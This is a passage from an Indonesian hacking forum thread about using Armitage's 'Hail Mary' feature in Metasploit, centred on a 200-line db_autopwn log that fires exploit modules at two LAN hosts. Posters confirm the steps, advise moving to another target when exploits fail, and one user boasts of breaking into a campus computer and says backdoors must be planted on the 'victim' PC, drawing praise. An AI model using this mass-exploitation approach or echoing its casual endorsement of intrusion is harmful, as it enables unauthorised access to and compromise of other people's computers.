ARMITAGE >HAILMARY ...IT'S SO Easy
#61
bro.. mohon solusi
ini setelah ane klik Hosts > Nmap scan > quick scan (Os detect)
terus ane masukin IP 192.168.1.0/24
muncul 2 kompi gelap semua gak da OS nya
terus ane Attacks > HAILMARY > by port

kok cuman muncul gnian ya

db_autopwn -r -e -p -R great
[*] (1/200 [0 sessions]): Launching exploit/windows/http/hp_nnm_ovwebsnmpsrv_ovutil against 192.168.1.5:8080...
[*] (2/200 [0 sessions]): Launching exploit/linux/http/piranha_passwd_exec against 192.168.1.5:8080...
[*] (3/200 [0 sessions]): Launching exploit/unix/webapp/joomla_tinybrowser against 192.168.1.5:8080...
[*] (4/200 [0 sessions]): Launching exploit/windows/ftp/oracle9i_xdb_ftp_pass against 192.168.1.1:21...
[*] (5/200 [0 sessions]): Launching exploit/windows/http/edirectory_imonitor against 192.168.1.1:80...
[*] (6/200 [0 sessions]): Launching exploit/windows/http/ca_arcserve_rpc_authbypass against 192.168.1.5:8080...
[*] (7/200 [0 sessions]): Launching exploit/multi/http/axis2_deployer against 192.168.1.5:8080...
[*] (8/200 [0 sessions]): Launching exploit/multi/http/tomcat_mgr_deploy against 192.168.1.1:80...
[*] (9/200 [0 sessions]): Launching exploit/unix/webapp/barracuda_img_exec against 192.168.1.1:80...
[*] (10/200 [0 sessions]): Launching exploit/unix/webapp/php_vbulletin_template against 192.168.1.5:8080...
[*] (11/200 [0 sessions]): Launching exploit/unix/webapp/sphpblog_file_upload against 192.168.1.1:80...
[*] (12/200 [0 sessions]): Launching exploit/windows/http/mailenable_auth_header against 192.168.1.1:80...
[*] (13/200 [0 sessions]): Launching exploit/windows/http/integard_password_bof against 192.168.1.1:80...
[*] (14/200 [0 sessions]): Launching exploit/multi/http/freenas_exec_raw against 192.168.1.5:8080...
[*] (15/200 [0 sessions]): Launching exploit/unix/webapp/barracuda_img_exec against 192.168.1.5:8080...
[*] (16/200 [0 sessions]): Launching exploit/unix/ftp/proftpd_133c_backdoor against 192.168.1.1:21...
[*] (17/200 [0 sessions]): Launching exploit/bsdi/softcart/mercantec_softcart against 192.168.1.5:8080...
[*] (18/200 [0 sessions]): Launching exploit/windows/http/badblue_ext_overflow against 192.168.1.5:8080...
[*] (19/200 [0 sessions]): Launching exploit/windows/http/coldfusion_fckeditor against 192.168.1.5:8080...
[*] (20/200 [0 sessions]): Launching exploit/unix/webapp/joomla_tinybrowser against 192.168.1.1:80...
[*] (21/200 [0 sessions]): Launching exploit/windows/http/hp_nnm_snmpviewer_actapp against 192.168.1.5:8080...
[*] (22/200 [0 sessions]): Launching exploit/windows/http/hp_nnm_getnnmdata_hostname against 192.168.1.5:8080...
[*] (23/200 [0 sessions]): Launching exploit/windows/http/hp_nnm_ovwebsnmpsrv_uro against 192.168.1.1:80...
[*] (24/200 [0 sessions]): Launching exploit/windows/http/hp_nnm_toolbar_01 against 192.168.1.1:80...
[*] (25/200 [0 sessions]): Launching exploit/multi/http/jboss_bshdeployer against 192.168.1.1:80...
[*] (26/200 [0 sessions]): Launching exploit/multi/realserver/describe against 192.168.1.1:80...
[*] (27/200 [0 sessions]): Launching exploit/windows/ftp/oracle9i_xdb_ftp_unlock against 192.168.1.1:21...
[*] (28/200 [0 sessions]): Launching exploit/multi/http/glassfish_deployer against 192.168.1.1:80...
[*] (29/200 [0 sessions]): Launching exploit/multi/http/axis2_deployer_rest against 192.168.1.1:80...
[*] (30/200 [0 sessions]): Launching exploit/windows/http/apache_mod_rewrite_ldap against 192.168.1.5:8080...
[*] (31/200 [0 sessions]): Launching exploit/unix/webapp/qtss_parse_xml_exec against 192.168.1.5:8080...
[*] (32/200 [0 sessions]): Launching exploit/multi/ftp/wuftpd_site_exec_format against 192.168.1.1:21...
[*] (33/200 [0 sessions]): Launching exploit/windows/http/fdm_auth_header against 192.168.1.1:80...
[*] (34/200 [0 sessions]): Launching exploit/unix/webapp/mambo_cache_lite against 192.168.1.5:8080...
[*] (35/200 [0 sessions]): Launching exploit/multi/http/glassfish_deployer against 192.168.1.5:8080...
[*] (36/200 [0 sessions]): Launching exploit/windows/http/easyftp_list against 192.168.1.5:8080...
[*] (37/200 [0 sessions]): Launching exploit/multi/realserver/describe against 192.168.1.5:8080...
[*] (38/200 [0 sessions]): Launching exploit/windows/http/badblue_passthru against 192.168.1.5:8080...
[*] (39/200 [0 sessions]): Launching exploit/windows/ftp/ms09_053_ftpd_nlst against 192.168.1.1:21...
[*] (40/200 [0 sessions]): Launching exploit/windows/iis/ms01_026_dbldecode against 192.168.1.1:80...
[*] (41/200 [0 sessions]): Launching exploit/windows/http/httpdx_handlepeer against 192.168.1.1:80...
[*] (42/200 [0 sessions]): Launching exploit/unix/webapp/cacti_graphimage_exec against 192.168.1.5:8080...
[*] (43/200 [0 sessions]): Launching exploit/windows/http/hp_nnm_getnnmdata_maxage against 192.168.1.5:8080...
[*] (44/200 [0 sessions]): Launching exploit/windows/http/integard_password_bof against 192.168.1.5:8080...
[*] (45/200 [0 sessions]): Launching exploit/multi/http/jboss_bshdeployer against 192.168.1.5:8080...
[*] (46/200 [0 sessions]): Launching exploit/windows/http/sapdb_webtools against 192.168.1.1:80...
[*] (47/200 [0 sessions]): Launching exploit/unix/webapp/php_wordpress_lastpost against 192.168.1.1:80...
[*] (48/200 [0 sessions]): Launching exploit/unix/webapp/tikiwiki_jhot_exec against 192.168.1.1:80...
[*] (49/200 [0 sessions]): Launching exploit/multi/wyse/hagent_untrusted_hsdata against 192.168.1.1:80...
[*] (50/200 [0 sessions]): Launching exploit/freebsd/ftp/proftp_telnet_iac against 192.168.1.1:21...
[*] (51/200 [0 sessions]): Launching exploit/unix/webapp/php_xmlrpc_eval against 192.168.1.1:80...
[*] (52/200 [0 sessions]): Launching exploit/windows/http/fdm_auth_header against 192.168.1.5:8080...
[*] (53/200 [0 sessions]): Launching exploit/unix/webapp/twiki_history against 192.168.1.5:8080...
[*] (54/200 [0 sessions]): Launching exploit/solaris/telnet/fuser against 192.168.1.1:23...
[*] (55/200 [0 sessions]): Launching exploit/windows/http/novell_imanager_upload against 192.168.1.1:80...
[*] (56/200 [0 sessions]): Launching exploit/windows/http/bea_weblogic_transfer_encoding against 192.168.1.1:80...
[*] (57/200 [0 sessions]): Launching exploit/windows/http/hp_nnm_ovwebsnmpsrv_ovutil against 192.168.1.1:80...
[*] (58/200 [0 sessions]): Launching exploit/windows/http/hp_nnm_ovwebhelp against 192.168.1.1:80...
[*] (59/200 [0 sessions]): Launching exploit/windows/http/sapdb_webtools against 192.168.1.5:8080...
[*] (60/200 [0 sessions]): Launching exploit/windows/http/hp_openview_insight_backdoor against 192.168.1.5:8080...
[*] (61/200 [0 sessions]): Launching exploit/unix/webapp/pajax_remote_exec against 192.168.1.1:80...
[*] (62/200 [0 sessions]): Launching exploit/windows/iis/iis_webdav_upload_asp against 192.168.1.1:80...
[*] (63/200 [0 sessions]): Launching exploit/unix/webapp/dogfood_spell_exec against 192.168.1.1:80...
[*] (64/200 [0 sessions]): Launching exploit/unix/webapp/redmine_scm_exec against 192.168.1.1:80...
[*] (65/200 [0 sessions]): Launching exploit/unix/webapp/oscommerce_filemanager against 192.168.1.5:8080...
[*] (66/200 [0 sessions]): Launching exploit/windows/http/easyftp_list against 192.168.1.1:80...
[*] (67/200 [0 sessions]): Launching exploit/linux/ftp/proftp_telnet_iac against 192.168.1.1:21...
[*] (68/200 [0 sessions]): Launching exploit/windows/http/ca_arcserve_rpc_authbypass against 192.168.1.1:80...
[*] (69/200 [0 sessions]): Launching exploit/windows/http/bea_weblogic_transfer_encoding against 192.168.1.5:8080...
[*] (70/200 [0 sessions]): Launching exploit/multi/http/axis2_deployer_rest against 192.168.1.5:8080...
[*] (71/200 [0 sessions]): Launching exploit/windows/ftp/easyftp_list_fixret against 192.168.1.1:21...
[*] (72/200 [0 sessions]): Launching exploit/unix/webapp/tikiwiki_graph_formula_exec against 192.168.1.1:80...
[*] (73/200 [0 sessions]): Launching exploit/windows/http/hp_nnm_getnnmdata_hostname against 192.168.1.1:80...
[*] (74/200 [0 sessions]): Launching exploit/windows/http/osb_uname_jlist against 192.168.1.5:8080...
[*] (75/200 [0 sessions]): Launching exploit/multi/http/spree_searchlogic_exec against 192.168.1.5:8080...
[*] (76/200 [0 sessions]): Launching exploit/multi/http/tomcat_mgr_deploy against 192.168.1.5:8080...
[*] (77/200 [0 sessions]): Launching exploit/windows/iis/ms03_007_ntdll_webdav against 192.168.1.1:80...
[*] (78/200 [0 sessions]): Launching exploit/multi/http/sun_jsws_dav_options against 192.168.1.1:80...
[*] (79/200 [0 sessions]): Launching exploit/multi/http/struts_code_exec against 192.168.1.1:80...
[*] (80/200 [0 sessions]): Launching exploit/windows/http/hp_openview_insight_backdoor against 192.168.1.1:80...
[*] (81/200 [0 sessions]): Launching exploit/windows/http/hp_nnm_getnnmdata_icount against 192.168.1.5:8080...
[*] (82/200 [0 sessions]): Launching exploit/windows/http/hp_nnm_webappmon_ovjavalocale against 192.168.1.5:8080...
[*] (83/200 [0 sessions]): Launching exploit/unix/webapp/tikiwiki_graph_formula_exec against 192.168.1.5:8080...
[*] (84/200 [0 sessions]): Launching exploit/unix/webapp/sphpblog_file_upload against 192.168.1.5:8080...
[*] (85/200 [0 sessions]): Launching exploit/multi/http/freenas_exec_raw against 192.168.1.1:80...
[*] (86/200 [0 sessions]): Launching exploit/unix/webapp/twiki_history against 192.168.1.1:80...
[*] (87/200 [0 sessions]): Launching exploit/unix/webapp/phpmyadmin_config against 192.168.1.1:80...
[*] (88/200 [0 sessions]): Launching exploit/unix/webapp/coppermine_piceditor against 192.168.1.5:8080...
[*] (89/200 [0 sessions]): Launching exploit/windows/http/novell_imanager_upload against 192.168.1.5:8080...
[*] (90/200 [0 sessions]): Launching exploit/unix/webapp/twiki_search against 192.168.1.5:8080...
[*] (91/200 [0 sessions]): Launching exploit/windows/http/ipswitch_wug_maincfgret against 192.168.1.1:80...
[*] (92/200 [0 sessions]): Launching exploit/unix/webapp/oscommerce_filemanager against 192.168.1.1:80...
[*] (93/200 [0 sessions]): Launching exploit/windows/http/mailenable_auth_header against 192.168.1.5:8080...
[*] (94/200 [0 sessions]): Launching exploit/unix/webapp/citrix_access_gateway_exec against 192.168.1.5:8080...
[*] (95/200 [0 sessions]): Launching exploit/unix/webapp/generic_exec against 192.168.1.5:8080...
[*] (96/200 [0 sessions]): Launching exploit/multi/http/jboss_deploymentfilerepository against 192.168.1.5:8080...
[*] (97/200 [0 sessions]): Launching exploit/unix/webapp/mambo_cache_lite against 192.168.1.1:80...
[*] (98/200 [0 sessions]): Launching exploit/multi/http/jboss_deploymentfilerepository against 192.168.1.1:80...
[*] (99/200 [0 sessions]): Launching exploit/windows/http/hp_nnm_webappmon_execvp against 192.168.1.5:8080...
[*] (100/200 [0 sessions]): Launching exploit/windows/http/zenworks_uploadservlet against 192.168.1.1:80...
[*] (101/200 [0 sessions]): Launching exploit/windows/http/adobe_robohelper_authbypass against 192.168.1.1:80...
[*] (102/200 [0 sessions]): Launching exploit/unix/webapp/awstatstotals_multisort against 192.168.1.1:80...
[*] (103/200 [0 sessions]): Launching exploit/unix/webapp/mitel_awc_exec against 192.168.1.1:80...
[*] (104/200 [0 sessions]): Launching exploit/unix/webapp/openx_banner_edit against 192.168.1.5:8080...
[*] (105/200 [0 sessions]): Launching exploit/unix/webapp/php_xmlrpc_eval against 192.168.1.5:8080...
[*] (106/200 [0 sessions]): Launching exploit/unix/webapp/php_include against 192.168.1.5:8080...
[*] (107/200 [0 sessions]): Launching exploit/windows/http/hp_nnm_openview5 against 192.168.1.1:80...
[*] (108/200 [0 sessions]): Launching exploit/bsdi/softcart/mercantec_softcart against 192.168.1.1:80...
[*] (109/200 [0 sessions]): Launching exploit/windows/iis/ms03_007_ntdll_webdav against 192.168.1.5:8080...
[*] (110/200 [0 sessions]): Launching exploit/windows/http/ipswitch_wug_maincfgret against 192.168.1.5:8080...
[*] (111/200 [0 sessions]): Launching exploit/windows/http/hp_nnm_ovwebsnmpsrv_uro against 192.168.1.5:8080...
[*] (112/200 [0 sessions]): Launching exploit/unix/webapp/oracle_vm_agent_utl against 192.168.1.5:8080...
[*] (113/200 [0 sessions]): Launching exploit/windows/http/hp_nnm_ovwebhelp against 192.168.1.5:8080...
[*] (114/200 [0 sessions]): Launching exploit/unix/webapp/awstats_migrate_exec against 192.168.1.1:80...
[*] (115/200 [0 sessions]): Launching exploit/windows/http/badblue_ext_overflow against 192.168.1.1:80...
[*] (116/200 [0 sessions]): Launching exploit/windows/http/apache_modjk_overflow against 192.168.1.1:80...
[*] (117/200 [0 sessions]): Launching exploit/windows/http/osb_uname_jlist against 192.168.1.1:80...
[*] (118/200 [0 sessions]): Launching exploit/windows/http/hp_nnm_ovwebsnmpsrv_main against 192.168.1.5:8080...
[*] (119/200 [0 sessions]): Launching exploit/windows/http/oracle9i_xdb_pass against 192.168.1.5:8080...
[*] (120/200 [0 sessions]): Launching exploit/windows/http/edirectory_imonitor against 192.168.1.5:8080...
[*] (121/200 [0 sessions]): Launching exploit/windows/iis/iis_webdav_upload_asp against 192.168.1.5:8080...
[*] (122/200 [0 sessions]): Launching exploit/unix/webapp/php_wordpress_lastpost against 192.168.1.5:8080...
[*] (123/200 [0 sessions]): Launching exploit/unix/webapp/php_vbulletin_template against 192.168.1.1:80...
[*] (124/200 [0 sessions]): Launching exploit/multi/http/spree_searchlogic_exec against 192.168.1.1:80...
[*] (125/200 [0 sessions]): Launching exploit/unix/webapp/citrix_access_gateway_exec against 192.168.1.1:80...
[*] (126/200 [0 sessions]): Launching exploit/unix/http/contentkeeperweb_mimencode against 192.168.1.1:80...
[*] (127/200 [0 sessions]): Launching exploit/unix/webapp/nagios3_statuswml_ping against 192.168.1.1:80...
[*] (128/200 [0 sessions]): Launching exploit/windows/http/coldfusion_fckeditor against 192.168.1.1:80...
[*] (129/200 [0 sessions]): Launching exploit/unix/webapp/pajax_remote_exec against 192.168.1.5:8080...
[*] (130/200 [0 sessions]): Launching exploit/windows/http/httpdx_handlepeer against 192.168.1.5:8080...
[*] (131/200 [0 sessions]): Launching exploit/unix/webapp/openx_banner_edit against 192.168.1.1:80...
[*] (132/200 [0 sessions]): Launching exploit/windows/ftp/httpdx_tolog_format against 192.168.1.1:21...
[*] (133/200 [0 sessions]): Launching exploit/unix/webapp/awstatstotals_multisort against 192.168.1.5:8080...
[*] (134/200 [0 sessions]): Launching exploit/unix/webapp/mitel_awc_exec against 192.168.1.5:8080...
[*] (135/200 [0 sessions]): Launching exploit/windows/http/intersystems_cache against 192.168.1.5:8080...
[*] (136/200 [0 sessions]): Launching exploit/unix/webapp/qtss_parse_xml_exec against 192.168.1.1:80...
[*] (137/200 [0 sessions]): Launching exploit/unix/webapp/php_include against 192.168.1.1:80...
[*] (138/200 [0 sessions]): Launching exploit/windows/http/efs_easychatserver_username against 192.168.1.1:80...
[*] (139/200 [0 sessions]): Launching exploit/windows/http/savant_31_overflow against 192.168.1.5:8080...
[*] (140/200 [0 sessions]): Launching exploit/solaris/telnet/ttyprompt against 192.168.1.1:23...
[*] (141/200 [0 sessions]): Launching exploit/windows/http/hp_nnm_webappmon_ovjavalocale against 192.168.1.1:80...
[*] (142/200 [0 sessions]): Launching exploit/windows/ftp/wsftp_server_503_mkd against 192.168.1.1:21...
[*] (143/200 [0 sessions]): Launching exploit/windows/ftp/vermillion_ftpd_port against 192.168.1.1:21...
[*] (144/200 [0 sessions]): Launching exploit/windows/http/hp_nnm_getnnmdata_icount against 192.168.1.1:80...
[*] (145/200 [0 sessions]): Launching exploit/linux/ftp/proftp_sreplace against 192.168.1.1:21...
[*] (146/200 [0 sessions]): Launching exploit/unix/webapp/generic_exec against 192.168.1.1:80...
[*] (147/200 [0 sessions]): Launching exploit/windows/http/savant_31_overflow against 192.168.1.1:80...
[*] (148/200 [0 sessions]): Launching exploit/linux/http/linksys_apply_cgi against 192.168.1.1:80...
[*] (149/200 [0 sessions]): Launching exploit/multi/http/axis2_deployer against 192.168.1.1:80...
[*] (150/200 [0 sessions]): Launching exploit/windows/ftp/easyftp_mkd_fixret against 192.168.1.1:21...
[*] (151/200 [0 sessions]): Launching exploit/unix/webapp/base_qry_common against 192.168.1.5:8080...
[*] (152/200 [0 sessions]): Launching exploit/unix/webapp/guestbook_ssi_exec against 192.168.1.5:8080...
[*] (153/200 [0 sessions]): Launching exploit/unix/webapp/twiki_search against 192.168.1.1:80...
[*] (154/200 [0 sessions]): Launching exploit/windows/http/hp_nnm_snmpviewer_actapp against 192.168.1.1:80...
[*] (155/200 [0 sessions]): Launching exploit/unix/webapp/phpmyadmin_config against 192.168.1.5:8080...
[*] (156/200 [0 sessions]): Launching exploit/unix/webapp/tikiwiki_jhot_exec against 192.168.1.5:8080...
[*] (157/200 [0 sessions]): Launching exploit/linux/http/linksys_apply_cgi against 192.168.1.5:8080...
[*] (158/200 [0 sessions]): Launching exploit/windows/http/adobe_robohelper_authbypass against 192.168.1.5:8080...
[*] (159/200 [0 sessions]): Launching exploit/windows/http/hp_nnm_ovalarm_lang against 192.168.1.5:8080...
[*] (160/200 [0 sessions]): Launching exploit/windows/http/hp_nnm_ovwebsnmpsrv_main against 192.168.1.1:80...
[*] (161/200 [0 sessions]): Launching exploit/linux/http/piranha_passwd_exec against 192.168.1.1:80...
[*] (162/200 [0 sessions]): Launching exploit/unix/webapp/coppermine_piceditor against 192.168.1.1:80...
[*] (163/200 [0 sessions]): Launching exploit/linux/http/ddwrt_cgibin_exec against 192.168.1.5:8080...
[*] (164/200 [0 sessions]): Launching exploit/unix/webapp/openview_connectednodes_exec against 192.168.1.1:80...
[*] (165/200 [0 sessions]): Launching exploit/windows/http/apache_mod_rewrite_ldap against 192.168.1.1:80...
[*] (166/200 [0 sessions]): Launching exploit/unix/webapp/oracle_vm_agent_utl against 192.168.1.1:80...
[*] (167/200 [0 sessions]): Launching exploit/unix/webapp/phpbb_highlight against 192.168.1.1:80...
[*] (168/200 [0 sessions]): Launching exploit/unix/webapp/redmine_scm_exec against 192.168.1.5:8080...
[*] (169/200 [0 sessions]): Launching exploit/windows/ftp/slimftpd_list_concat against 192.168.1.1:21...
[*] (170/200 [0 sessions]): Launching exploit/windows/ftp/globalscapeftp_input against 192.168.1.1:21...
[*] (171/200 [0 sessions]): Launching exploit/windows/proxy/bluecoat_winproxy_host against 192.168.1.1:80...
[*] (172/200 [0 sessions]): Launching exploit/windows/ftp/easyftp_cwd_fixret against 192.168.1.1:21...
[*] (173/200 [0 sessions]): Launching exploit/windows/http/navicopa_get_overflow against 192.168.1.1:80...
[*] (174/200 [0 sessions]): Launching exploit/windows/http/hp_nnm_snmp against 192.168.1.1:80...
[*] (175/200 [0 sessions]): Launching exploit/multi/http/struts_code_exec against 192.168.1.5:8080...
[*] (176/200 [0 sessions]): Launching exploit/unix/webapp/dogfood_spell_exec against 192.168.1.5:8080...
[*] (177/200 [0 sessions]): Launching exploit/unix/webapp/awstats_migrate_exec against 192.168.1.5:8080...
[*] (178/200 [0 sessions]): Launching exploit/unix/webapp/awstats_configdir_exec against 192.168.1.1:80...
[*] (179/200 [0 sessions]): Launching exploit/windows/http/hp_nnm_getnnmdata_maxage against 192.168.1.1:80...
[*] (180/200 [0 sessions]): Launching exploit/unix/webapp/awstats_configdir_exec against 192.168.1.5:8080...
[*] (181/200 [0 sessions]): Launching exploit/unix/webapp/nagios3_statuswml_ping against 192.168.1.5:8080...
[*] (182/200 [0 sessions]): Launching exploit/windows/http/httpdx_tolog_format against 192.168.1.1:80...
[*] (183/200 [0 sessions]): Launching exploit/unix/webapp/base_qry_common against 192.168.1.1:80...
[*] (184/200 [0 sessions]): Launching exploit/windows/http/hp_nnm_ovalarm_lang against 192.168.1.1:80...
[*] (185/200 [0 sessions]): Launching exploit/unix/webapp/guestbook_ssi_exec against 192.168.1.1:80...
[*] (186/200 [0 sessions]): Launching exploit/windows/http/zenworks_uploadservlet against 192.168.1.5:8080...
[*] (187/200 [0 sessions]): Launching exploit/multi/http/sun_jsws_dav_options against 192.168.1.5:8080...
[*] (188/200 [0 sessions]): Launching exploit/windows/http/hp_nnm_toolbar_01 against 192.168.1.5:8080...
[*] (189/200 [0 sessions]): Launching exploit/windows/http/hp_nnm_snmp against 192.168.1.5:8080...
[*] (190/200 [0 sessions]): Launching exploit/windows/http/intersystems_cache against 192.168.1.1:80...
[*] (191/200 [0 sessions]): Launching exploit/unix/webapp/openview_connectednodes_exec against 192.168.1.5:8080...
[*] (192/200 [0 sessions]): Launching exploit/unix/webapp/phpbb_highlight against 192.168.1.5:8080...
[*] (193/200 [0 sessions]): Launching exploit/unix/ftp/vsftpd_234_backdoor against 192.168.1.1:21...
[*] (194/200 [0 sessions]): Launching exploit/windows/ftp/netterm_netftpd_user against 192.168.1.1:21...
[*] (195/200 [0 sessions]): Launching exploit/linux/http/ddwrt_cgibin_exec against 192.168.1.1:80...
[*] (196/200 [0 sessions]): Launching exploit/windows/http/httpdx_tolog_format against 192.168.1.5:8080...
[*] (197/200 [0 sessions]): Launching exploit/windows/http/efs_easychatserver_username against 192.168.1.5:8080...
[*] (198/200 [0 sessions]): Launching exploit/windows/http/hp_nnm_webappmon_execvp against 192.168.1.1:80...
[*] (199/200 [0 sessions]): Launching exploit/windows/http/badblue_passthru against 192.168.1.1:80...
[*] (200/200 [0 sessions]): Launching exploit/unix/webapp/cacti_graphimage_exec against 192.168.1.1:80...
[*] (200/200 [0 sessions]): Waiting on 26 launched modules to finish execution...
[*] (200/200 [0 sessions]): Waiting on 9 launched modules to finish execution...
[*] (200/200 [0 sessions]): Waiting on 9 launched modules to finish execution...
[*] (200/200 [0 sessions]): Waiting on 8 launched modules to finish execution...
[*] (200/200 [0 sessions]): Waiting on 6 launched modules to finish execution...
[*] (200/200 [0 sessions]): Waiting on 4 launched modules to finish execution...
[*] (200/200 [0 sessions]): Waiting on 3 launched modules to finish execution...
[*] (200/200 [0 sessions]): Waiting on 3 launched modules to finish execution...
[*] (200/200 [0 sessions]): Waiting on 2 launched modules to finish execution...
[*] (200/200 [0 sessions]): Waiting on 2 launched modules to finish execution...
[*] (200/200 [0 sessions]): Waiting on 2 launched modules to finish execution...
[*] (200/200 [0 sessions]): Waiting on 2 launched modules to finish execution...
[*] (200/200 [0 sessions]): Waiting on 2 launched modules to finish execution...
[*] (200/200 [0 sessions]): Waiting on 2 launched modules to finish execution...
[*] (200/200 [0 sessions]): Waiting on 1 launched modules to finish execution...
[*] (200/200 [0 sessions]): Waiting on 1 launched modules to finish execution...
[*] (200/200 [0 sessions]): Waiting on 1 launched modules to finish execution...
[*] (200/200 [0 sessions]): Waiting on 1 launched modules to finish execution...
[*] (200/200 [0 sessions]): Waiting on 1 launched modules to finish execution...
[*] (200/200 [0 sessions]): Waiting on 1 launched modules to finish execution...
[*] (200/200 [0 sessions]): Waiting on 1 launched modules to finish execution...
[*] (200/200 [0 sessions]): Waiting on 1 launched modules to finish execution...
[*] (200/200 [0 sessions]): Waiting on 1 launched modules to finish execution...
[*] (200/200 [0 sessions]): Waiting on 1 launched modules to finish execution...
[*] (200/200 [0 sessions]): Waiting on 0 launched modules to finish execution...

ini terus gmana bro???
kok gak bisa muncul kompi yang ada petirnya, ane dah coba berkali2 bro.. tapi hasilnya tetep.
apa ane salah masukin IP nya ya???
mohon kawan2 kasih soluisi
trims
(09-07-2011, 05:03 PM)Minbar Wrote: setelah bolak baci coba lagi gagal lagi, coba lagi gagal lagi, akhirnya bisa juga jalankan nmap di armitage,

ane dah dapet yg sampe ikon kompi tanda petir, tapi item ga ketahuan OSnya, terus ane klik kanan jadi bengong lagi banyak pilihannya, klo mau kaya di halaman I love backtrack yg ngambil screenshoot sama liat webcamnya ntu yg mananya ya om?

bro minbar gmana tuh supaya bisa keluar kompi nyang ada petirnya???, mohon di jelasin langkah2nya
trim

#62
kayaknya memang ga bisa bro, itu komputer pake firewall/antivirus yg kuat kali soalnya udah launch exploit tapi jenisnya dari berbagai macam OS dan tetap ga dapet sessions

tampaknya harus coba ke lain target Smile


#63
ow.. gtu ya bro...,
berarti langkah lankah ane uda bener ya bro??

#64
yup udah bener Smile

#65
makasih brother...
sekali coba langsung berhasil masuk ke komputer kampus saya.

- Setelah saya suruh dosen menghidupkan firewall, tiba2 koneksi terpustus.
jadi intinya firewall dan antivirus masih bisa mem-block armitage.
Jadi harus tanam backdoor ke PC korban.

Ini screenshot dari BT 5 saya, masuk ke komputer kampus.
:badpc:

[Image: ngrfnl.png]

#66
nice work om anacia...

#67
(11-04-2011, 05:07 PM)anacia Wrote: makasih brother...
sekali coba langsung berhasil masuk ke komputer kampus saya.

- Setelah saya suruh dosen menghidupkan firewall, tiba2 koneksi terpustus.
jadi intinya firewall dan antivirus masih bisa mem-block armitage.
Jadi harus tanam backdoor ke PC korban.

Ini screenshot dari BT 5 saya, masuk ke komputer kampus.
:badpc:

[Image: ngrfnl.png]

weehhh ada yg kena petir tuh....mantap om.

#68
permisi om, mau tanya nich...
stelah ane buka msfgui > klik show connection detail > setelah loading lama banget ternyata ga' ada hasilnya (dialog box g' muncul)......

apa ada yang slah ya om??? mohon bantuannya....
---->>> Request Timed Out...

#69
(12-01-2011, 12:09 PM)cll Wrote: permisi om, mau tanya nich...
stelah ane buka msfgui > klik show connection detail > setelah loading lama banget ternyata ga' ada hasilnya (dialog box g' muncul)......

apa ada yang slah ya om??? mohon bantuannya....

udah terkonek dengan baikkah database ?

#70
blom tau jg Om,,, mklum newbi Big Grin

ngecek.nya gmana ya Om???
di forum ini udah banyak yg ane praktekin... tp kbnyakan gagal... Big Grin
mgkin ksalahan praktek ane nybabin praktek ane yg laen ikutan salah juga ya om??


---->>> Request Timed Out...






Users browsing this thread: 1 Guest(s)